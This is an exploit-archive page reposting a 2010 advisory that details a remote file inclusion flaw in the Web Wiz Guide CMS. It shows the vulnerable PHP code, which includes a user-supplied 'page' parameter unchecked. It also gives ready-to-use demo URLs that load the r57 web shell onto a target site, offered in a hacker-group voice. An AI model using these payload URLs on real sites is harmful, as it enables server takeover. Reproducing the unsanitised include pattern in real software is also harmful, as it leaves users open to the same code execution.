Web Wiz Guide Remote File Inclusion

Web Wiz Guide Remote File Inclusion: Posted Jun 26, 2010; Authored by kannibal615; Web Wiz Guide suffers from a remote file inclusion vulnerability.; tags | exploit, remote, web, code execution, file inclusion; SHA-256 | 866cf7c625672092751430af640d3da34b008e36fb762c8ea1d095b1cdac3be2; Download | Favorite | View

Web Wiz Guide Remote File Inclusion




# Exploit Title: (Web Wiz Guide) Remote File Include Vulnerability
# Date: 23-05-2010
# Author: kannibal615
# Software Link: N/A
# Version: 2007/2008
# Tested on: PHP
# CVE : N/A
# Code : 


         @@    @@  @@@@@      @@   @@     @@      @@@@@@  @@  @@   @@@@@@@  @@@@@
         @@    @@  @@   @@    @@   @@   @@  @@   @@       @@ @@    @@       @@   @@
          @@  @@   @@ @@@     @@@@@@@  @@@@@@@@  @@       @@@@     @@@@@@   @@ @@
           @@@@    @@   @@    @@   @@  @@    @@  @@       @@  @@   @@       @@   @@
            @@     @@@@@      @@   @@  @@    @@   @@@@@@  @@   @@  @@@@@@@  @@    @@

                                       KANNIBAL615

===[Exploit Name]========================================================

(Web Wiz Guide) REMOTE FILE INCLUSION


===[Found By]==========================================================

== Found By   : kannibal615
== Website    : www.vbhacker.net/vb
== Email      : zn[at]live[dot]de
== From       : TUNISIA > TUNISIE 
== Thanks to  : ALL VBHACKER MEMBERS


===[Exploit Info]========================================================

==  CMS     :  Web Wiz Guide - Web Wiz Rich cms
==  version :  2007/2008
==  risk    :  hight
==  dork    :  kannibal615 is the best ;)


===[Bug File]===========================================================

==  Bug :
(
   <?php

$user = "index";
$other = "admin";
session_start();
include_once "main.php";

               $page = isset($_GET['page'])?$_GET['page']:"main";

//            echo "***********   including: $page.$ext  ************ <Br>";
            
            include "$page";

            
                       
                    
        ?> 
)


==  Vulnerable file : index.php
==  Vulnerable variable : $page
==  
==  Demo :
==  
==  http://[localhost]/path/[index.php]?[$page]=[evil_script.txt???]
==  http://www.site.com/index.php?page=r57.txt???
== 
==
===[The End]=============================================================

==  enjoy  :)
==
==  kannibal615 Copyright 2010
==
==  www.vbhacker.net/vb
=======================================================================                 
_________________________________________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free.
https://signup.live.com/signup.aspx?id=60969

Top Authors In Last 30 Days

Red Hat 184 files
Ubuntu 64 files
Debian 22 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Google Security Research 6 files
Apple 6 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,009)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,174)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,460)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,433)
UNIX (9,390)
UnixWare (187)
Windows (6,648)
Other

Web Wiz Guide Remote File Inclusion

Web Wiz Guide Remote File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Web Wiz Guide Remote File Inclusion

Share This

Web Wiz Guide Remote File Inclusion

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems